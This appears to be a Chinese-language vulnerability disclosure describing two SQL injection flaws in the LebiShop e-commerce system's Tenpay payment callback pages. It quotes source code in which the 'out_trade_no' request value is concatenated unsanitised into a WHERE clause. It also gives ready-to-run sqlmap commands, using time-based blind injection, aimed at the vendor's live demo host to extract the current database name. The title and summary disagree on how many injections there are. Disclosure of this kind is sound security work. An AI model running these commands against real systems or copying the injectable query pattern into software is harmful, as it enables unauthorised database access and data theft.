LebiShop系统sql注入三（两处注入）

### 简要描述： LebiShop商城系统最新版SQL注入二 四处 官方demo演示 ### 详细说明： 注入一 ``` http://demo.lebi.cn/onlinepay/tenpayJSDZ/payNotifyUrl.aspx ``` 源码如下 ``` protected void Page_Load(object sender, EventArgs e) { string where = base.Request["out_trade_no"]; //没处理 Lebi_Order model = B_Lebi_Order.GetModel(where); //跟进 if (model == null) { base.Response.Write("系统错误"); base.Response.End(); } else { TenpayUtil util = new TenpayUtil(model); ResponseHandler handler = new ResponseHandler(this.Context); .... public Lebi_Order_Log GetModel(string strWhere) { if (strWhere.IndexOf("lbsql{") > 0) { SQLPara para = new SQLPara(strWhere, "", ""); return this.GetModel(para); } StringBuilder builder = new StringBuilder(); builder.Append("select top 1 * from [Lebi_Order_Log] "); builder.Append(" where " + strWhere); //strWhere 没处理存在注入 Lebi_Order_Log log = new Lebi_Order_Log(); DataSet set = SqlUtils.SqlUtilsInstance.TextExecuteDataset(builder.ToString()); if (set.Tables[0].Rows.Count <= 0) { return null; } if (set.Tables[0].Rows[0]["id"].ToString() != "") { log.id = int.Parse(set.Tables[0].Rows[0]["id"].ToString()); } if (set.Tables[0].Rows[0]["Order_id"].ToString() != "") { log.Order_id = int.Parse(set.Tables[0].Rows[0]["Order_id"].ToString()); } if (set.Tables[0].Rows[0]["User_id"].ToString() != "") { log.User_id = int.Parse(set.Tables[0].Rows[0]["User_id"].ToString()); } if (set.Tables[0].Rows[0]["Admin_id"].ToString() != "") { log.Admin_id = int.Parse(set.Tables[0].Rows[0]["Admin_id"].ToString()); } log.Admin_Name = set.Tables[0].Rows[0]["Admin_Name"].ToString(); log.Content = set.Tables[0].Rows[0]["Content"].ToString(); if (set.Tables[0].Rows[0]["Time_Add"].ToString() != "") { log.Time_Add = DateTime.Parse(set.Tables[0].Rows[0]["Time_Add"].ToString()); } return log; } ``` 注入二 ``` http://demo.lebi.cn/onlinepay/tenpayJSDZ/payReturnUrl.aspx ``` ``` protected void Page_Load(object sender, EventArgs e) { string where = base.Request["out_trade_no"]; //没处理 Lebi_Order model = B_Lebi_Order.GetModel(where);//跟进 if (model == null) { base.Response.Write("系统错误"); base.Response.End(); } else { TenpayUtil util = new TenpayUtil(model); ResponseHandler handler = new ResponseHandler(this.Context); handler.setKey(util.tenpay_key); if (handler.isTenpaySign()) ``` ``` public Lebi_Order GetModel(string strWhere) { if (strWhere.IndexOf("lbsql{") > 0) { SQLPara para = new SQLPara(strWhere, "", ""); return this.GetModel(para); } StringBuilder builder = new StringBuilder(); builder.Append("select top 1 * from [Lebi_Order] "); builder.Append(" where " + strWhere); //存在注入了 Lebi_Order order = new Lebi_Order(); DataSet set = SqlUtils.SqlUtilsInstance.TextExecuteDataset(builder.ToString()); if (set.Tables[0].Rows.Count <= 0) ``` ### 漏洞证明： 注入一 sqlmap扫描 ``` sqlmap -u "http://demo.lebi.cn/onlinepay/tenpayJSDZ/payNotifyUrl.aspx" --data "out_trade_no=1>2" --dbms "mssql" --technique=T --current-db --time-sec 10 ``` [<img src="https://images.seebug.org/upload/201503/02233221883586af737cd98d79a3a571ccd1801f.png" alt="555.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/02233221883586af737cd98d79a3a571ccd1801f.png) [<img src="https://images.seebug.org/upload/201503/02233647b498072f8acd3f487806bfe801cfaf06.png" alt="556.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/02233647b498072f8acd3f487806bfe801cfaf06.png) 第二处注入 sqlmap扫描 ``` sqlmap -u "http://demo.lebi.cn/onlinepay/tenpayJSDZ/payReturnUrl.aspx" --data "out_trade_no=1>2" --dbms "mssql" --technique=T --current-db --time-sec 10 ``` [<img src="https://images.seebug.org/upload/201503/0223393231ed5665fbf4b7d234614ed5e53e346e.png" alt="557.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/0223393231ed5665fbf4b7d234614ed5e53e346e.png) [<img src="https://images.seebug.org/upload/201503/02234537dc3401173c8b6d6d0affd6eadd0aa0c1.png" alt="558.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/02234537dc3401173c8b6d6d0affd6eadd0aa0c1.png)